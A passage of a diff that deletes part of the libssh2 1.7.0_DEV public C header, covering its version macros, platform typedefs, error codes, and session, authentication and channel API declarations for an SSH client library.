- * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
- * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
- * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
- * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
- * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
- * NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
- * USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
- * OF SUCH DAMAGE.
- */
-
-#ifndef LIBSSH2_H
-#define LIBSSH2_H 1
-
-#define LIBSSH2_COPYRIGHT "2004-2016 The libssh2 project and its contributors."
-
-/* We use underscore instead of dash when appending DEV in dev versions just
-   to make the BANNER define (used by src/session.c) be a valid SSH
-   banner. Release versions have no appended strings and may of course not
-   have dashes either. */
-#define LIBSSH2_VERSION                             "1.7.0_DEV"
-
-/* The numeric version number is also available "in parts" by using these
-   defines: */
-#define LIBSSH2_VERSION_MAJOR                       1
-#define LIBSSH2_VERSION_MINOR                       7
-#define LIBSSH2_VERSION_PATCH                       0
-
-/* This is the numeric version of the libssh2 version number, meant for easier
-   parsing and comparions by programs. The LIBSSH2_VERSION_NUM define will
-   always follow this syntax:
-
-         0xXXYYZZ
-
-   Where XX, YY and ZZ are the main version, release and patch numbers in
-   hexadecimal (using 8 bits each). All three numbers are always represented
-   using two digits.  1.2 would appear as "0x010200" while version 9.11.7
-   appears as "0x090b07".
-
-   This 6-digit (24 bits) hexadecimal number does not show pre-release number,
-   and it is always a greater number in a more recent release. It makes
-   comparisons with greater than and less than work.
-*/
-#define LIBSSH2_VERSION_NUM                         0x010700
-
-/*
- * This is the date and time when the full source package was created. The
- * timestamp is not stored in the source code repo, as the timestamp is
- * properly set in the tarballs by the maketgz script.
- *
- * The format of the date should follow this template:
- *
- * "Mon Feb 12 11:35:33 UTC 2007"
- */
-#define LIBSSH2_TIMESTAMP "DEV"
-
-#ifndef RC_INVOKED
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-#ifdef _WIN32
-# include <basetsd.h>
-# include <winsock2.h>
-#endif
-
-#include <stddef.h>
-#include <string.h>
-#include <sys/stat.h>
-#include <sys/types.h>
-
-/* Allow alternate API prefix from CFLAGS or calling app */
-#ifndef LIBSSH2_API
-# ifdef LIBSSH2_WIN32
-#  ifdef _WINDLL
-#   ifdef LIBSSH2_LIBRARY
-#    define LIBSSH2_API __declspec(dllexport)
-#   else
-#    define LIBSSH2_API __declspec(dllimport)
-#   endif /* LIBSSH2_LIBRARY */
-#  else
-#   define LIBSSH2_API
-#  endif
-# else /* !LIBSSH2_WIN32 */
-#  define LIBSSH2_API
-# endif /* LIBSSH2_WIN32 */
-#endif /* LIBSSH2_API */
-
-#ifdef HAVE_SYS_UIO_H
-# include <sys/uio.h>
-#endif
-
-#if (defined(NETWARE) && !defined(__NOVELL_LIBC__))
-# include <sys/bsdskt.h>
-typedef unsigned char uint8_t;
-typedef unsigned int uint32_t;
-#endif
-
-#ifdef _MSC_VER
-typedef unsigned char uint8_t;
-typedef unsigned int uint32_t;
-typedef unsigned __int64 libssh2_uint64_t;
-typedef __int64 libssh2_int64_t;
-#ifndef ssize_t
-typedef SSIZE_T ssize_t;
-#endif
-#else
-typedef unsigned long long libssh2_uint64_t;
-typedef long long libssh2_int64_t;
-#endif
-
-#ifdef WIN32
-typedef SOCKET libssh2_socket_t;
-#define LIBSSH2_INVALID_SOCKET INVALID_SOCKET
-#else /* !WIN32 */
-typedef int libssh2_socket_t;
-#define LIBSSH2_INVALID_SOCKET -1
-#endif /* WIN32 */
-
-/*
- * Determine whether there is small or large file support on windows.
- */
-
-#if defined(_MSC_VER) && !defined(_WIN32_WCE)
-#  if (_MSC_VER >= 900) && (_INTEGRAL_MAX_BITS >= 64)
-#    define LIBSSH2_USE_WIN32_LARGE_FILES
-#  else
-#    define LIBSSH2_USE_WIN32_SMALL_FILES
-#  endif
-#endif
-
-#if defined(__MINGW32__) && !defined(LIBSSH2_USE_WIN32_LARGE_FILES)
-#  define LIBSSH2_USE_WIN32_LARGE_FILES
-#endif
-
-#if defined(__WATCOMC__) && !defined(LIBSSH2_USE_WIN32_LARGE_FILES)
-#  define LIBSSH2_USE_WIN32_LARGE_FILES
-#endif
-
-#if defined(__POCC__)
-#  undef LIBSSH2_USE_WIN32_LARGE_FILES
-#endif
-
-#if defined(_WIN32) && !defined(LIBSSH2_USE_WIN32_LARGE_FILES) && \
-    !defined(LIBSSH2_USE_WIN32_SMALL_FILES)
-#  define LIBSSH2_USE_WIN32_SMALL_FILES
-#endif
-
-/*
- * Large file (>2Gb) support using WIN32 functions.
- */
-
-#ifdef LIBSSH2_USE_WIN32_LARGE_FILES
-#  include <io.h>
-#  include <sys/types.h>
-#  include <sys/stat.h>
-#  define LIBSSH2_STRUCT_STAT_SIZE_FORMAT    "%I64d"
-typedef struct _stati64 libssh2_struct_stat;
-typedef __int64 libssh2_struct_stat_size;
-#endif
-
-/*
- * Small file (<2Gb) support using WIN32 functions.
- */
-
-#ifdef LIBSSH2_USE_WIN32_SMALL_FILES
-#  include <sys/types.h>
-#  include <sys/stat.h>
-#  ifndef _WIN32_WCE
-#    define LIBSSH2_STRUCT_STAT_SIZE_FORMAT    "%d"
-typedef struct _stat libssh2_struct_stat;
-typedef off_t libssh2_struct_stat_size;
-#  endif
-#endif
-
-#ifndef LIBSSH2_STRUCT_STAT_SIZE_FORMAT
-#  ifdef __VMS
-/* We have to roll our own format here because %z is a C99-ism we don't have. */
-#    if __USE_OFF64_T || __USING_STD_STAT
-#      define LIBSSH2_STRUCT_STAT_SIZE_FORMAT      "%Ld"
-#    else
-#      define LIBSSH2_STRUCT_STAT_SIZE_FORMAT      "%d"
-#    endif
-#  else
-#    define LIBSSH2_STRUCT_STAT_SIZE_FORMAT      "%zd"
-#  endif
-typedef struct stat libssh2_struct_stat;
-typedef off_t libssh2_struct_stat_size;
-#endif
-
-/* Part of every banner, user specified or not */
-#define LIBSSH2_SSH_BANNER                  "SSH-2.0-libssh2_" LIBSSH2_VERSION
-
-/* We *could* add a comment here if we so chose */
-#define LIBSSH2_SSH_DEFAULT_BANNER                  LIBSSH2_SSH_BANNER
-#define LIBSSH2_SSH_DEFAULT_BANNER_WITH_CRLF        LIBSSH2_SSH_DEFAULT_BANNER "\r\n"
-
-/* Default generate and safe prime sizes for diffie-hellman-group-exchange-sha1 */
-#define LIBSSH2_DH_GEX_MINGROUP     1024
-#define LIBSSH2_DH_GEX_OPTGROUP     1536
-#define LIBSSH2_DH_GEX_MAXGROUP     2048
-
-/* Defaults for pty requests */
-#define LIBSSH2_TERM_WIDTH      80
-#define LIBSSH2_TERM_HEIGHT     24
-#define LIBSSH2_TERM_WIDTH_PX   0
-#define LIBSSH2_TERM_HEIGHT_PX  0
-
-/* 1/4 second */
-#define LIBSSH2_SOCKET_POLL_UDELAY      250000
-/* 0.25 * 120 == 30 seconds */
-#define LIBSSH2_SOCKET_POLL_MAXLOOPS    120
-
-/* Maximum size to allow a payload to compress to, plays it safe by falling
-   short of spec limits */
-#define LIBSSH2_PACKET_MAXCOMP      32000
-
-/* Maximum size to allow a payload to deccompress to, plays it safe by
-   allowing more than spec requires */
-#define LIBSSH2_PACKET_MAXDECOMP    40000
-
-/* Maximum size for an inbound compressed payload, plays it safe by
-   overshooting spec limits */
-#define LIBSSH2_PACKET_MAXPAYLOAD   40000
-
-/* Malloc callbacks */
-#define LIBSSH2_ALLOC_FUNC(name)   void *name(size_t count, void **abstract)
-#define LIBSSH2_REALLOC_FUNC(name) void *name(void *ptr, size_t count, \
-                                              void **abstract)
-#define LIBSSH2_FREE_FUNC(name)    void name(void *ptr, void **abstract)
-
-typedef struct _LIBSSH2_USERAUTH_KBDINT_PROMPT
-{
-    char* text;
-    unsigned int length;
-    unsigned char echo;
-} LIBSSH2_USERAUTH_KBDINT_PROMPT;
-
-typedef struct _LIBSSH2_USERAUTH_KBDINT_RESPONSE
-{
-    char* text;
-    unsigned int length;
-} LIBSSH2_USERAUTH_KBDINT_RESPONSE;
-
-/* 'publickey' authentication callback */
-#define LIBSSH2_USERAUTH_PUBLICKEY_SIGN_FUNC(name) \
-  int name(LIBSSH2_SESSION *session, unsigned char **sig, size_t *sig_len, \
-           const unsigned char *data, size_t data_len, void **abstract)
-
-/* 'keyboard-interactive' authentication callback */
-#define LIBSSH2_USERAUTH_KBDINT_RESPONSE_FUNC(name_) \
- void name_(const char* name, int name_len, const char* instruction, \
-            int instruction_len, int num_prompts, \
-            const LIBSSH2_USERAUTH_KBDINT_PROMPT* prompts, \
-            LIBSSH2_USERAUTH_KBDINT_RESPONSE* responses, void **abstract)
-
-/* Callbacks for special SSH packets */
-#define LIBSSH2_IGNORE_FUNC(name) \
- void name(LIBSSH2_SESSION *session, const char *message, int message_len, \
-           void **abstract)
-
-#define LIBSSH2_DEBUG_FUNC(name) \
- void name(LIBSSH2_SESSION *session, int always_display, const char *message, \
-           int message_len, const char *language, int language_len, \
-           void **abstract)
-
-#define LIBSSH2_DISCONNECT_FUNC(name) \
- void name(LIBSSH2_SESSION *session, int reason, const char *message, \
-           int message_len, const char *language, int language_len, \
-           void **abstract)
-
-#define LIBSSH2_PASSWD_CHANGEREQ_FUNC(name) \
- void name(LIBSSH2_SESSION *session, char **newpw, int *newpw_len, \
-           void **abstract)
-
-#define LIBSSH2_MACERROR_FUNC(name) \
- int name(LIBSSH2_SESSION *session, const char *packet, int packet_len, \
-          void **abstract)
-
-#define LIBSSH2_X11_OPEN_FUNC(name) \
- void name(LIBSSH2_SESSION *session, LIBSSH2_CHANNEL *channel, \
-           const char *shost, int sport, void **abstract)
-
-#define LIBSSH2_CHANNEL_CLOSE_FUNC(name) \
-  void name(LIBSSH2_SESSION *session, void **session_abstract, \
-            LIBSSH2_CHANNEL *channel, void **channel_abstract)
-
-/* I/O callbacks */
-#define LIBSSH2_RECV_FUNC(name)  ssize_t name(libssh2_socket_t socket, \
-                                              void *buffer, size_t length, \
-                                              int flags, void **abstract)
-#define LIBSSH2_SEND_FUNC(name)  ssize_t name(libssh2_socket_t socket, \
-                                              const void *buffer, size_t length,\
-                                              int flags, void **abstract)
-
-/* libssh2_session_callback_set() constants */
-#define LIBSSH2_CALLBACK_IGNORE             0
-#define LIBSSH2_CALLBACK_DEBUG              1
-#define LIBSSH2_CALLBACK_DISCONNECT         2
-#define LIBSSH2_CALLBACK_MACERROR           3
-#define LIBSSH2_CALLBACK_X11                4
-#define LIBSSH2_CALLBACK_SEND               5
-#define LIBSSH2_CALLBACK_RECV               6
-
-/* libssh2_session_method_pref() constants */
-#define LIBSSH2_METHOD_KEX          0
-#define LIBSSH2_METHOD_HOSTKEY      1
-#define LIBSSH2_METHOD_CRYPT_CS     2
-#define LIBSSH2_METHOD_CRYPT_SC     3
-#define LIBSSH2_METHOD_MAC_CS       4
-#define LIBSSH2_METHOD_MAC_SC       5
-#define LIBSSH2_METHOD_COMP_CS      6
-#define LIBSSH2_METHOD_COMP_SC      7
-#define LIBSSH2_METHOD_LANG_CS      8
-#define LIBSSH2_METHOD_LANG_SC      9
-
-/* flags */
-#define LIBSSH2_FLAG_SIGPIPE        1
-#define LIBSSH2_FLAG_COMPRESS       2
-
-typedef struct _LIBSSH2_SESSION                     LIBSSH2_SESSION;
-typedef struct _LIBSSH2_CHANNEL                     LIBSSH2_CHANNEL;
-typedef struct _LIBSSH2_LISTENER                    LIBSSH2_LISTENER;
-typedef struct _LIBSSH2_KNOWNHOSTS                  LIBSSH2_KNOWNHOSTS;
-typedef struct _LIBSSH2_AGENT                       LIBSSH2_AGENT;
-
-typedef struct _LIBSSH2_POLLFD {
-    unsigned char type; /* LIBSSH2_POLLFD_* below */
-
-    union {
-        libssh2_socket_t socket; /* File descriptors -- examined with
-                                    system select() call */
-        LIBSSH2_CHANNEL *channel; /* Examined by checking internal state */
-        LIBSSH2_LISTENER *listener; /* Read polls only -- are inbound
-                                       connections waiting to be accepted? */
-    } fd;
-
-    unsigned long events; /* Requested Events */
-    unsigned long revents; /* Returned Events */
-} LIBSSH2_POLLFD;
-
-/* Poll FD Descriptor Types */
-#define LIBSSH2_POLLFD_SOCKET       1
-#define LIBSSH2_POLLFD_CHANNEL      2
-#define LIBSSH2_POLLFD_LISTENER     3
-
-/* Note: Win32 Doesn't actually have a poll() implementation, so some of these
-   values are faked with select() data */
-/* Poll FD events/revents -- Match sys/poll.h where possible */
-#define LIBSSH2_POLLFD_POLLIN           0x0001 /* Data available to be read or
-                                                  connection available --
-                                                  All */
-#define LIBSSH2_POLLFD_POLLPRI          0x0002 /* Priority data available to
-                                                  be read -- Socket only */
-#define LIBSSH2_POLLFD_POLLEXT          0x0002 /* Extended data available to
-                                                  be read -- Channel only */
-#define LIBSSH2_POLLFD_POLLOUT          0x0004 /* Can may be written --
-                                                  Socket/Channel */
-/* revents only */
-#define LIBSSH2_POLLFD_POLLERR          0x0008 /* Error Condition -- Socket */
-#define LIBSSH2_POLLFD_POLLHUP          0x0010 /* HangUp/EOF -- Socket */
-#define LIBSSH2_POLLFD_SESSION_CLOSED   0x0010 /* Session Disconnect */
-#define LIBSSH2_POLLFD_POLLNVAL         0x0020 /* Invalid request -- Socket
-                                                  Only */
-#define LIBSSH2_POLLFD_POLLEX           0x0040 /* Exception Condition --
-                                                  Socket/Win32 */
-#define LIBSSH2_POLLFD_CHANNEL_CLOSED   0x0080 /* Channel Disconnect */
-#define LIBSSH2_POLLFD_LISTENER_CLOSED  0x0080 /* Listener Disconnect */
-
-#define HAVE_LIBSSH2_SESSION_BLOCK_DIRECTION
-/* Block Direction Types */
-#define LIBSSH2_SESSION_BLOCK_INBOUND                  0x0001
-#define LIBSSH2_SESSION_BLOCK_OUTBOUND                 0x0002
-
-/* Hash Types */
-#define LIBSSH2_HOSTKEY_HASH_MD5                            1
-#define LIBSSH2_HOSTKEY_HASH_SHA1                           2
-
-/* Hostkey Types */
-#define LIBSSH2_HOSTKEY_TYPE_UNKNOWN			    0
-#define LIBSSH2_HOSTKEY_TYPE_RSA			    1
-#define LIBSSH2_HOSTKEY_TYPE_DSS			    2
-
-/* Disconnect Codes (defined by SSH protocol) */
-#define SSH_DISCONNECT_HOST_NOT_ALLOWED_TO_CONNECT          1
-#define SSH_DISCONNECT_PROTOCOL_ERROR                       2
-#define SSH_DISCONNECT_KEY_EXCHANGE_FAILED                  3
-#define SSH_DISCONNECT_RESERVED                             4
-#define SSH_DISCONNECT_MAC_ERROR                            5
-#define SSH_DISCONNECT_COMPRESSION_ERROR                    6
-#define SSH_DISCONNECT_SERVICE_NOT_AVAILABLE                7
-#define SSH_DISCONNECT_PROTOCOL_VERSION_NOT_SUPPORTED       8
-#define SSH_DISCONNECT_HOST_KEY_NOT_VERIFIABLE              9
-#define SSH_DISCONNECT_CONNECTION_LOST                      10
-#define SSH_DISCONNECT_BY_APPLICATION                       11
-#define SSH_DISCONNECT_TOO_MANY_CONNECTIONS                 12
-#define SSH_DISCONNECT_AUTH_CANCELLED_BY_USER               13
-#define SSH_DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE       14
-#define SSH_DISCONNECT_ILLEGAL_USER_NAME                    15
-
-/* Error Codes (defined by libssh2) */
-#define LIBSSH2_ERROR_NONE                      0
-
-/* The library once used -1 as a generic error return value on numerous places
-   through the code, which subsequently was converted to
-   LIBSSH2_ERROR_SOCKET_NONE uses over time. As this is a generic error code,
-   the goal is to never ever return this code but instead make sure that a
-   more accurate and descriptive error code is used. */
-#define LIBSSH2_ERROR_SOCKET_NONE               -1
-
-#define LIBSSH2_ERROR_BANNER_RECV               -2
-#define LIBSSH2_ERROR_BANNER_SEND               -3
-#define LIBSSH2_ERROR_INVALID_MAC               -4
-#define LIBSSH2_ERROR_KEX_FAILURE               -5
-#define LIBSSH2_ERROR_ALLOC                     -6
-#define LIBSSH2_ERROR_SOCKET_SEND               -7
-#define LIBSSH2_ERROR_KEY_EXCHANGE_FAILURE      -8
-#define LIBSSH2_ERROR_TIMEOUT                   -9
-#define LIBSSH2_ERROR_HOSTKEY_INIT              -10
-#define LIBSSH2_ERROR_HOSTKEY_SIGN              -11
-#define LIBSSH2_ERROR_DECRYPT                   -12
-#define LIBSSH2_ERROR_SOCKET_DISCONNECT         -13
-#define LIBSSH2_ERROR_PROTO                     -14
-#define LIBSSH2_ERROR_PASSWORD_EXPIRED          -15
-#define LIBSSH2_ERROR_FILE                      -16
-#define LIBSSH2_ERROR_METHOD_NONE               -17
-#define LIBSSH2_ERROR_AUTHENTICATION_FAILED     -18
-#define LIBSSH2_ERROR_PUBLICKEY_UNRECOGNIZED    LIBSSH2_ERROR_AUTHENTICATION_FAILED
-#define LIBSSH2_ERROR_PUBLICKEY_UNVERIFIED      -19
-#define LIBSSH2_ERROR_CHANNEL_OUTOFORDER        -20
-#define LIBSSH2_ERROR_CHANNEL_FAILURE           -21
-#define LIBSSH2_ERROR_CHANNEL_REQUEST_DENIED    -22
-#define LIBSSH2_ERROR_CHANNEL_UNKNOWN           -23
-#define LIBSSH2_ERROR_CHANNEL_WINDOW_EXCEEDED   -24
-#define LIBSSH2_ERROR_CHANNEL_PACKET_EXCEEDED   -25
-#define LIBSSH2_ERROR_CHANNEL_CLOSED            -26
-#define LIBSSH2_ERROR_CHANNEL_EOF_SENT          -27
-#define LIBSSH2_ERROR_SCP_PROTOCOL              -28
-#define LIBSSH2_ERROR_ZLIB                      -29
-#define LIBSSH2_ERROR_SOCKET_TIMEOUT            -30
-#define LIBSSH2_ERROR_SFTP_PROTOCOL             -31
-#define LIBSSH2_ERROR_REQUEST_DENIED            -32
-#define LIBSSH2_ERROR_METHOD_NOT_SUPPORTED      -33
-#define LIBSSH2_ERROR_INVAL                     -34
-#define LIBSSH2_ERROR_INVALID_POLL_TYPE         -35
-#define LIBSSH2_ERROR_PUBLICKEY_PROTOCOL        -36
-#define LIBSSH2_ERROR_EAGAIN                    -37
-#define LIBSSH2_ERROR_BUFFER_TOO_SMALL          -38
-#define LIBSSH2_ERROR_BAD_USE                   -39
-#define LIBSSH2_ERROR_COMPRESS                  -40
-#define LIBSSH2_ERROR_OUT_OF_BOUNDARY           -41
-#define LIBSSH2_ERROR_AGENT_PROTOCOL            -42
-#define LIBSSH2_ERROR_SOCKET_RECV               -43
-#define LIBSSH2_ERROR_ENCRYPT                   -44
-#define LIBSSH2_ERROR_BAD_SOCKET                -45
-#define LIBSSH2_ERROR_KNOWN_HOSTS               -46
-
-/* this is a define to provide the old (<= 1.2.7) name */
-#define LIBSSH2_ERROR_BANNER_NONE LIBSSH2_ERROR_BANNER_RECV
-
-/* Global API */
-#define LIBSSH2_INIT_NO_CRYPTO        0x0001
-
-/*
- * libssh2_init()
- *
- * Initialize the libssh2 functions.  This typically initialize the
- * crypto library.  It uses a global state, and is not thread safe --
- * you must make sure this function is not called concurrently.
- *
- * Flags can be:
- * 0:                              Normal initialize
- * LIBSSH2_INIT_NO_CRYPTO:         Do not initialize the crypto library (ie.
- *                                 OPENSSL_add_cipher_algoritms() for OpenSSL
- *
- * Returns 0 if succeeded, or a negative value for error.
- */
-LIBSSH2_API int libssh2_init(int flags);
-
-/*
- * libssh2_exit()
- *
- * Exit the libssh2 functions and free's all memory used internal.
- */
-LIBSSH2_API void libssh2_exit(void);
-
-/*
- * libssh2_free()
- *
- * Deallocate memory allocated by earlier call to libssh2 functions.
- */
-LIBSSH2_API void libssh2_free(LIBSSH2_SESSION *session, void *ptr);
-
-/*
- * libssh2_session_supported_algs()
- *
- * Fills algs with a list of supported acryptographic algorithms. Returns a
- * non-negative number (number of supported algorithms) on success or a
- * negative number (an eror code) on failure.
- *
- * NOTE: on success, algs must be deallocated (by calling libssh2_free) when
- * not needed anymore
- */
-LIBSSH2_API int libssh2_session_supported_algs(LIBSSH2_SESSION* session,
-                                               int method_type,
-                                               const char*** algs);
-
-/* Session API */
-LIBSSH2_API LIBSSH2_SESSION *
-libssh2_session_init_ex(LIBSSH2_ALLOC_FUNC((*my_alloc)),
-                        LIBSSH2_FREE_FUNC((*my_free)),
-                        LIBSSH2_REALLOC_FUNC((*my_realloc)), void *abstract);
-#define libssh2_session_init() libssh2_session_init_ex(NULL, NULL, NULL, NULL)
-
-LIBSSH2_API void **libssh2_session_abstract(LIBSSH2_SESSION *session);
-
-LIBSSH2_API void *libssh2_session_callback_set(LIBSSH2_SESSION *session,
-                                               int cbtype, void *callback);
-LIBSSH2_API int libssh2_session_banner_set(LIBSSH2_SESSION *session,
-                                           const char *banner);
-LIBSSH2_API int libssh2_banner_set(LIBSSH2_SESSION *session,
-                                   const char *banner);
-
-LIBSSH2_API int libssh2_session_startup(LIBSSH2_SESSION *session, int sock);
-LIBSSH2_API int libssh2_session_handshake(LIBSSH2_SESSION *session,
-                                          libssh2_socket_t sock);
-LIBSSH2_API int libssh2_session_disconnect_ex(LIBSSH2_SESSION *session,
-                                              int reason,
-                                              const char *description,
-                                              const char *lang);
-#define libssh2_session_disconnect(session, description) \
-  libssh2_session_disconnect_ex((session), SSH_DISCONNECT_BY_APPLICATION, \
-                                (description), "")
-
-LIBSSH2_API int libssh2_session_free(LIBSSH2_SESSION *session);
-
-LIBSSH2_API const char *libssh2_hostkey_hash(LIBSSH2_SESSION *session,
-                                             int hash_type);
-
-LIBSSH2_API const char *libssh2_session_hostkey(LIBSSH2_SESSION *session,
-                                                size_t *len, int *type);
-
-LIBSSH2_API int libssh2_session_method_pref(LIBSSH2_SESSION *session,
-                                            int method_type,
-                                            const char *prefs);
-LIBSSH2_API const char *libssh2_session_methods(LIBSSH2_SESSION *session,
-                                                int method_type);
-LIBSSH2_API int libssh2_session_last_error(LIBSSH2_SESSION *session,
-                                           char **errmsg,
-                                           int *errmsg_len, int want_buf);
-LIBSSH2_API int libssh2_session_last_errno(LIBSSH2_SESSION *session);
-LIBSSH2_API int libssh2_session_set_last_error(LIBSSH2_SESSION* session,
-                                               int errcode,
-                                               const char* errmsg);
-LIBSSH2_API int libssh2_session_block_directions(LIBSSH2_SESSION *session);
-
-LIBSSH2_API int libssh2_session_flag(LIBSSH2_SESSION *session, int flag,
-                                     int value);
-LIBSSH2_API const char *libssh2_session_banner_get(LIBSSH2_SESSION *session);
-
-/* Userauth API */
-LIBSSH2_API char *libssh2_userauth_list(LIBSSH2_SESSION *session,
-                                        const char *username,
-                                        unsigned int username_len);
-LIBSSH2_API int libssh2_userauth_authenticated(LIBSSH2_SESSION *session);
-
-LIBSSH2_API int libssh2_userauth_password_ex(LIBSSH2_SESSION *session,
-                                             const char *username,
-                                             unsigned int username_len,
-                                             const char *password,
-                                             unsigned int password_len,
-                                             LIBSSH2_PASSWD_CHANGEREQ_FUNC((*passwd_change_cb)));
-
-#define libssh2_userauth_password(session, username, password) \
- libssh2_userauth_password_ex((session), (username),           \
-                              (unsigned int)strlen(username),  \
-                              (password), (unsigned int)strlen(password), NULL)
-
-LIBSSH2_API int
-libssh2_userauth_publickey_fromfile_ex(LIBSSH2_SESSION *session,
-                                       const char *username,
-                                       unsigned int username_len,
-                                       const char *publickey,
-                                       const char *privatekey,
-                                       const char *passphrase);
-
-#define libssh2_userauth_publickey_fromfile(session, username, publickey, \
-                                            privatekey, passphrase)     \
-    libssh2_userauth_publickey_fromfile_ex((session), (username),       \
-                                           (unsigned int)strlen(username), \
-                                           (publickey),                 \
-                                           (privatekey), (passphrase))
-
-LIBSSH2_API int
-libssh2_userauth_publickey(LIBSSH2_SESSION *session,
-                           const char *username,
-                           const unsigned char *pubkeydata,
-                           size_t pubkeydata_len,
-                           LIBSSH2_USERAUTH_PUBLICKEY_SIGN_FUNC((*sign_callback)),
-                           void **abstract);
-
-LIBSSH2_API int
-libssh2_userauth_hostbased_fromfile_ex(LIBSSH2_SESSION *session,
-                                       const char *username,
-                                       unsigned int username_len,
-                                       const char *publickey,
-                                       const char *privatekey,
-                                       const char *passphrase,
-                                       const char *hostname,
-                                       unsigned int hostname_len,
-                                       const char *local_username,
-                                       unsigned int local_username_len);
-
-#define libssh2_userauth_hostbased_fromfile(session, username, publickey, \
-                                            privatekey, passphrase, hostname) \
- libssh2_userauth_hostbased_fromfile_ex((session), (username), \
-                                        (unsigned int)strlen(username), \
-                                        (publickey),                    \
-                                        (privatekey), (passphrase),     \
-                                        (hostname),                     \
-                                        (unsigned int)strlen(hostname), \
-                                        (username),                     \
-                                        (unsigned int)strlen(username))
-
-LIBSSH2_API int
-libssh2_userauth_publickey_frommemory(LIBSSH2_SESSION *session,
-                                      const char *username,
-                                      size_t username_len,
-                                      const char *publickeyfiledata,
-                                      size_t publickeyfiledata_len,
-                                      const char *privatekeyfiledata,
-                                      size_t privatekeyfiledata_len,
-                                      const char *passphrase);
-
-/*
- * response_callback is provided with filled by library prompts array,
- * but client must allocate and fill individual responses. Responses
- * array is already allocated. Responses data will be freed by libssh2
- * after callback return, but before subsequent callback invokation.
- */
-LIBSSH2_API int
-libssh2_userauth_keyboard_interactive_ex(LIBSSH2_SESSION* session,
-                                         const char *username,
-                                         unsigned int username_len,
-                                         LIBSSH2_USERAUTH_KBDINT_RESPONSE_FUNC(
-                                                       (*response_callback)));
-
-#define libssh2_userauth_keyboard_interactive(session, username,        \
-                                              response_callback)        \
-    libssh2_userauth_keyboard_interactive_ex((session), (username),     \
-                                             (unsigned int)strlen(username), \
-                                             (response_callback))
-
-LIBSSH2_API int libssh2_poll(LIBSSH2_POLLFD *fds, unsigned int nfds,
-                             long timeout);
-
-/* Channel API */
-#define LIBSSH2_CHANNEL_WINDOW_DEFAULT  (2*1024*1024)
-#define LIBSSH2_CHANNEL_PACKET_DEFAULT  32768
-#define LIBSSH2_CHANNEL_MINADJUST       1024
-
-/* Extended Data Handling */
-#define LIBSSH2_CHANNEL_EXTENDED_DATA_NORMAL        0
-#define LIBSSH2_CHANNEL_EXTENDED_DATA_IGNORE        1
-#define LIBSSH2_CHANNEL_EXTENDED_DATA_MERGE         2
-
-#define SSH_EXTENDED_DATA_STDERR 1
-
-/* Returned by any function that would block during a read/write opperation */
-#define LIBSSH2CHANNEL_EAGAIN LIBSSH2_ERROR_EAGAIN
-
-LIBSSH2_API LIBSSH2_CHANNEL *
-libssh2_channel_open_ex(LIBSSH2_SESSION *session, const char *channel_type,
-                        unsigned int channel_type_len,
-                        unsigned int window_size, unsigned int packet_size,
-                        const char *message, unsigned int message_len);
-
-#define libssh2_channel_open_session(session) \
-  libssh2_channel_open_ex((session), "session", sizeof("session") - 1, \
-                          LIBSSH2_CHANNEL_WINDOW_DEFAULT, \
-                          LIBSSH2_CHANNEL_PACKET_DEFAULT, NULL, 0)
-
-LIBSSH2_API LIBSSH2_CHANNEL *
-libssh2_channel_direct_tcpip_ex(LIBSSH2_SESSION *session, const char *host,
-                                int port, const char *shost, int sport);
-#define libssh2_channel_direct_tcpip(session, host, port) \
-  libssh2_channel_direct_tcpip_ex((session), (host), (port), "127.0.0.1", 22)
-
-LIBSSH2_API LIBSSH2_LISTENER *
-libssh2_channel_forward_listen_ex(LIBSSH2_SESSION *session, const char *host,
-                                  int port, int *bound_port, int queue_maxsize);
-#define libssh2_channel_forward_listen(session, port) \
- libssh2_channel_forward_listen_ex((session), NULL, (port), NULL, 16)
-
-LIBSSH2_API int libssh2_channel_forward_cancel(LIBSSH2_LISTENER *listener);
-
-LIBSSH2_API LIBSSH2_CHANNEL *
-libssh2_channel_forward_accept(LIBSSH2_LISTENER *listener);
-
-LIBSSH2_API int libssh2_channel_setenv_ex(LIBSSH2_CHANNEL *channel,
-                                          const char *varname,
-                                          unsigned int varname_len,
-                                          const char *value,
-                                          unsigned int value_len);
-
-#define libssh2_channel_setenv(channel, varname, value)                 \
-    libssh2_channel_setenv_ex((channel), (varname),                     \
-                              (unsigned int)strlen(varname), (value),   \
-                              (unsigned int)strlen(value))
-
-LIBSSH2_API int libssh2_channel_request_pty_ex(LIBSSH2_CHANNEL *channel,
-                                               const char *term,
-                                               unsigned int term_len,
-                                               const char *modes,
-                                               unsigned int modes_len,
-                                               int width, int height,
-                                               int width_px, int height_px);
-#define libssh2_channel_request_pty(channel, term)                      \
-    libssh2_channel_request_pty_ex((channel), (term),                   \
-                                   (unsigned int)strlen(term),          \
-                                   NULL, 0,                             \
-                                   LIBSSH2_TERM_WIDTH, LIBSSH2_TERM_HEIGHT, \
-                                   LIBSSH2_TERM_WIDTH_PX, LIBSSH2_TERM_HEIGHT_PX)
-
-LIBSSH2_API int libssh2_channel_request_pty_size_ex(LIBSSH2_CHANNEL *channel,
-                                                    int width, int height,
-                                                    int width_px,
-                                                    int height_px);
-#define libssh2_channel_request_pty_size(channel, width, height) \
-  libssh2_channel_request_pty_size_ex( (channel), (width), (height), 0, 0)
-
-LIBSSH2_API int libssh2_channel_x11_req_ex(LIBSSH2_CHANNEL *channel,
-                                           int single_connection,
-                                           const char *auth_proto,
-                                           const char *auth_cookie,
-                                           int screen_number);
-#define libssh2_channel_x11_req(channel, screen_number) \
- libssh2_channel_x11_req_ex((channel), 0, NULL, NULL, (screen_number))
-
-LIBSSH2_API int libssh2_channel_process_startup(LIBSSH2_CHANNEL *channel,
-                                                const char *request,
-                                                unsigned int request_len,
-                                                const char *message,
-                                                unsigned int message_len);
-#define libssh2_channel_shell(channel) \
-  libssh2_channel_process_startup((channel), "shell", sizeof("shell") - 1, \
-                                  NULL, 0)
